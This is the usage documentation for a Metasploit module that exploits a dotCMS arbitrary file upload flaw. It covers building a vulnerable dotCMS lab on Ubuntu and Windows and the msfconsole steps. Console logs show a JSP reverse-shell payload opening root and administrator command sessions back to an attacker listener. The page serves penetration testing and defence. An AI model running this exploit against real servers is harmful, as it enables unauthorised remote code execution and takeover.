Jack Heysel
6.3 KiB
6.3 KiB
Vulnerable Application
Description
This module exploits an arbitrary file upload vulnerability in dotCMS versions before 22.03, 5.3.8.10, 21.06.7 in each respective stream. The module uploads a jsp payload to the tomcat ROOT directory and accesses it to trigger its execution.
Clone and build a vulnerable version of dotCMS:
This requires Java 1.8 to be installed and JAVA_HOME to be set (see below for per OS instructions).
git clone https://github.com/dotCMS/core.gitcd coregit checkout 7d604e5 (this is vulnerable version 21.06)cd dotCMS/./gradlew createDist
Starting a Gradle Daemon (subsequent builds will be faster)
<output truncated>
BUILD SUCCESSFUL in 12m 53s
21 actionable tasks: 19 executed, 2 up-to-date
If the build was successful you should now have a vulnerable 21.06 linux and windows instance:
msfuser@ubuntu:~/core/dotCMS$ ls -l ../dist-output/
total 811132
-rw-rw-r-- 1 msfuser msfuser 413134562 May 20 10:22 dotcms_21.06.tar.gz
-rw-rw-r-- 1 msfuser msfuser 417462181 May 20 10:24 dotcms_21.06.zip
Inside each of the above compressed directories exists a directory dotserver which contains the vulnerable app.
Ubuntu 20.04 install
Install JAVA 1.8
export JAVA_HOME="/usr/lib/jvm/java-8-openjdk-amd64"export PATH=$JAVA_HOME/bin:$PATHsudo apt-get install openjdk-8-jdk
Install Postgres
sudo apt install postgresql -ysudo -u postgres psql- Change the default database, username and password from
dotcmstopostgres(or create the db and userdotcms). vim $DOTCMS_HOME/dotserver/tomcat-9.0.41/webapps/ROOT/WEB-INF/classes/db.properties
##Postgres default configuration
driverClassName=org.postgresql.Driver
jdbcUrl=jdbc:postgresql://localhost/postgres
username=postgres
password=postgres
Install Elastic Search
sudo apt install apt-transport-https ca-certificates wgetwget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -sudo sh -c 'echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" > /etc/apt/sources.list.d/elastic-7.x.list'sudo apt updatesudo apt install elasticsearchsudo systemctl daemon-reloadsudo systemctl enable elasticsearch.servicesudo systemctl start elasticsearch.servicesudo systemctl status elasticsearch.service- Edit
dotcms-config-cluster.propertiesto ensure the following properties are set: vim $DOTCMS_HOME/dotserver/tomcat-9.0.41/webapps/ROOT/WEB-INF/classes/dotcms-config-cluster.properties
ES_ENDPOINTS=http://localhost:9200
ES_PROTOCOL=http
ES_HOSTNAME=localhost
ES_PORT=9200
ES_TLS_ENABLED=false
Run dotCMS
cd dotserver/tomcat-9.0.41/bin/chmod 755 *.shcatalina.sh run- Test the server is up with:
curl -vk localhost:8080/dotAdmin/
Windows 10 install
Install Java 1.8
- Download and follow wizard to install: https://www.oracle.com/java/technologies/downloads/#license-lightbox
Install Elasticsearch 8.2.0
Download and follow wizard to install: https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-8.2.0-windows-x86_64.zip dotcms-config-cluster.properties
- Ensure dotcms-config-cluster.properties contains the same properties as specified above
Install Postgres 10.21
- Download and follow wizard to install: https://www.enterprisedb.com/postgresql-tutorial-resources-training?uuid=ea5c8104-3940-4ed1-b427-81cf19781581&campaignId=70138000000rYFmAAM
- Ensure db.properties contains the same properties as specified above
Run dotCMS
cd dotserver\tomcat-9.0.41\bin\catalina.bat run- Test the server is up with:
curl -vk localhost:8080/dotAdmin/
Verification Steps
use multi/http/dotcms_file_upload_rceset RHOSTS [ips]set LHOST [ips]run
Scenarios
Ubuntu 20.04 dotCMS 21.06:
msf6 > use exploit/multi/http/dotcms_file_upload_rce
[*] Using configured payload java/jsp_shell_reverse_tcp
msf6 exploit(multi/http/dotcms_file_upload_rce) > set rhosts 172.16.199.227
rhosts => 172.16.199.227
msf6 exploit(multi/http/dotcms_file_upload_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/http/dotcms_file_upload_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Writing JSP payload
[+] Successfully wrote JSP payload
[*] Executing JSP payload
[+] Successfully executed JSP payload
[+] Deleted ../webapps/ROOT/XZhKXIssjD.jsp
[+] Deleted ../webapps/ROOT/M4NYE9Kb.jsp
[*] Command shell session 1 opened (172.16.199.1:4444 -> 172.16.199.227:39610) at 2022-05-20 15:01:25 -0400
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux ubuntu 5.13.0-41-generic #46~20.04.1-Ubuntu SMP Wed Apr 20 13:16:21 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Windows 10 dotCMS 21.06:
msf6 > use dotcms_file_upload_rce
[*] Using exploit/multi/http/dotcms_file_upload_rce
msf6 exploit(multi/http/dotcms_file_upload_rce) > set rhosts 172.16.199.231
rhosts => 172.16.199.231
msf6 exploit(multi/http/dotcms_file_upload_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/http/dotcms_file_upload_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Writing JSP payload
[+] Successfully wrote JSP payload
[*] Executing JSP payload
[+] Successfully executed JSP payload
[!] Tried to delete ../webapps/ROOT/AkqMhxCZWr.jsp, unknown result
[!] Tried to delete ../webapps/ROOT/xdPfn9JTdu33X.jsp, unknown result
[*] Command shell session 1 opened (172.16.199.1:4444 -> 172.16.199.231:50016) at 2022-05-20 12:41:36 -0400
Shell Banner:
Microsoft Windows [Version 10.0.19042.1706]
(c) Microsoft Corporation. All rights reserved.
-----
C:\Users\Administrator\Downloads\dotcms_21.06\dotserver\tomcat-9.0.41\bin>whoami
whoami
desktop-h1lncdm\administrator
C:\Users\Administrator\Downloads\dotcms_21.06\dotserver\tomcat-9.0.41\bin>systeminfo
systeminfo
Host Name: DESKTOP-H1LNCDM
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19042 N/A Build 19042
<output truncated>
Note on windows the module reports an unknown result when trying to delete the files though it does successfully